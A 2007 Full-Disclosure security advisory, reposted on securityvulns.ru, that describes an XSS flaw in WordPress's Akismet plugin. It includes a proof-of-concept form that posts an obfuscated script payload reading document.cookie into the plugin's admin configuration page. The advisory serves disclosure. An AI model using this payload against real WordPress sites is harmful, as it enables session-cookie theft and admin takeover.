Computer Security

Security Advisory: [Full-disclosure] Wordpress Akismet XSS flaw
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [CVE-2007-1355] Tomcat documentation XSS vulnerabilities

  [Full-disclosure] PsychoStats 3.0.6b and prior

  ACal Web Calendar 2.2.6 Remote File Include Vulnerabilities

  Madirish Webmail v2.0 Remote File Include Vulnerabilities

From:mybeni websecurity <mybeni_(at)_mybeni.rootzilla.de>
Date:19.05.2007
Subject:[Full-disclosure] Wordpress Akismet XSS flaw

-------------------- CODE -----------------------------
&lt;html&gt;
&lt;body&gt;
&lt;form
action="http://blog.url/wp-admin/plugins.php?page=akismet-key-config"
method="post" id="akismet-conf"&gt;

&lt;input name="_wpnonce" value="'" type="text"&gt;
&lt;input name="_wp_http_referer"
value="'%2522><script>eval(String.fromCharCode(97,
108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,
41))</script>"
type="text"&gt;

&lt;input id="key" name="key" size="15" maxlength="12" value="1337"&gt;
&lt;input name="submit" value="Update options ยป" type="submit"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
-------------------- EOC ------------------------------

http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware
_of_the_dog/

--
benjamin "beNi"
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi

(coolest guy in da hood)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru